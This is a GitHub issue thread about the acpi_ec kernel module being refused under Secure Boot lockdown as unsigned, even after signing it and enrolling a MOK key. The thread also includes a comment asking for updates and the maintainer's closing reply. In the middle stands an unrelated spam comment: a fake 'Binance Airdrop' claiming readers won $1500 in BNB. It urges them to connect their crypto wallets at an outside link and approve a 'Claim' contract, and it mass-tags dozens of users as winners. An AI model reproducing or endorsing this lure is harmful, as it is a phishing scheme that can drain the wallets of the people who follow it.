### ISSUE TITLE
Unsigned module loading is restricted

### ISSUE THREAD

**Issue by abhigit23** [MusiKid/acpi_ec#8]
**acpi_ec** is not working with kernel lockdown on archlinux.
Same issue was occurred last time when I tested it on Fedora Workstation 37.
There's no way to use nbfc-linux on a lockdown kernel without disabling the Secure Boot.
Here are the errors which I have gotten while loading the module.

```$ sudo modprobe acpi_ec```
modprobe: ERROR: could not insert 'acpi_ec': Operation not permitted

```$ journalctl --follow```
archlinux kernel: **Lockdown: modprobe: unsigned module loading is restricted; see man kernel_lockdown.7**

**OS:** Arch Linux x86_64
**Kernel:** 6.2.7-arch1-1
**Secure Boot:** Enabled
**Lockdowm mode:** Integrity

**Comment by saidsay-so** [comment]
Did you use the `install.sh` script? It automatically signs the module to avoid this error.

**Comment by abhigit23** [comment]
Yes, I used the install script, reboot the system, added key from the MOK manager. Mokutil also shows the key is present but still idk why it gives unsigned kernel module warning when I enable kernel lockdown.

**Comment by Shadowphoenix** [comment]
any updates on this? /dev/ec not being accessible sadly makes using the ISW-Fancontrol on Msi unusable.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @sunafu0304, @huchuanzhou888, @blazickjp, @rich0620, @chasehu123, @Open-ATS-Github, @westwind990, @terrascura, @tomvictor, @LowzG, @Kestrel118, @lihuibng, @degiorgioo, @nafeen, @youssef-md, @r3sdev, @beratbarancevik, @hodlmans, @cardinalsystem256, @abhayc-main, @LeoNero, @shankarshastri, @jalovisko, @Z86-tech, @jstrandt, @abhishekgahlot, @bianyuanop, @cjsampson, @ttibau, @SampsonW24, @Loopite, @VellMoment, @reedchan7, @henrry179, @minazukie, @ahicham-xyz, @sabman, @0101010101010101010101010101, @fenghaolinroix, @ymali001, @dart-bird, @Oldenborg, @ItsSerta, @nahzca, @yxccn0Hack, @ieu68667, @lolwierd, @DiamondKen, @hakanabasi, @hanysa3d

**Comment by saidsay-so** [comment]
Sorry for the late answer, if you still have the problem feel free to re-open it.
